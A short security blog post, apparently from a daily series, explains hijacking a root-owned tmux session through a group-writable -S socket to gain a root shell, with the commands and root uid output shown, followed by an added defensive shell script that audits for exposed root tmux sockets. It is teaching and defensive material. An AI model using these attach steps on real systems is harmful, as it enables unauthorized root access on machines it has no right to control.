Day 69: Hijacking Tmux Sessions 2 Priv. Esc.
Tmux is a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window. It is useful for running more than one command-line program at the same time.
Tmux can be prone to a local privilege-escalation vulnerability because it fails to properly drop group permissions obtained through setGID.
There was a great advisory some years back where you could just run -S with anything…
Using Tmux to Priv. Esc.
Look for a /usr/bin/tmux process running as root whose socket (the -S path) allows our group to rw, in order to hijack the root shell
Check for process…
user@box:/# ps -u root
/usr/bin/tmux -S /.devs/dev_sess
Check we can read/write…
user@box:/# ls -la /.devs/dev_sess
srw-rw---- 1 root usergroup
Now run the same command you saw in the process list from your own user terminal, as a user whose group membership allows rw on the socket, to attach to the session…
user@box:/# tmux -S /.devs/dev_sess
uid=0(root) gid=0(root) groups=0(root)
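
From the defender's side, the same two checks (a root tmux process started with -S, and a socket that group or other can write to) can be run as an audit. This is an added example, not part of the original post; it assumes Linux with procps ps and GNU stat, and the function names are made up for illustration.

```shell
#!/bin/sh
# Added example: flag root-owned tmux sessions whose -S socket lets other
# accounts attach. Assumes Linux (procps ps, GNU stat); names are illustrative.

# Reads "USER ARGS..." lines (the format of `ps -eo user=,args=`) on stdin and
# prints the -S socket path of each tmux process owned by root.
# Limitation: socket paths containing spaces are not handled.
root_tmux_sockets() {
    awk '$1 == "root" && ($2 == "tmux" || $2 ~ /\/tmux$/) {
        for (i = 3; i <= NF; i++) {
            if ($i == "-S" && i < NF) print $(i + 1)   # "-S /path"
            else if ($i ~ /^-S./) print substr($i, 3)  # "-S/path"
        }
    }'
}

# Succeeds when the octal mode grants write to group or other. On Linux,
# connecting to a UNIX socket needs write permission on the socket file.
mode_allows_attach() {
    [ $(( 0$1 & 022 )) -ne 0 ]
}

# Prints one "EXPOSED mode owner:group path" line per risky socket.
audit_tmux_sockets() {
    ps -eo user=,args= | root_tmux_sockets | while IFS= read -r sock; do
        [ -S "$sock" ] || continue
        mode=$(stat -c '%a' "$sock") || continue
        if mode_allows_attach "$mode"; then
            echo "EXPOSED $mode $(stat -c '%U:%G' "$sock") $sock"
        fi
    done
}

# Run the audit only when asked to, e.g. `sh audit.sh --run`.
if [ "${1:-}" = "--run" ]; then
    audit_tmux_sockets
fi
```

A socket flagged here can be closed off with chmod 600 on the socket, or by not running root's tmux on a socket path that other groups can reach.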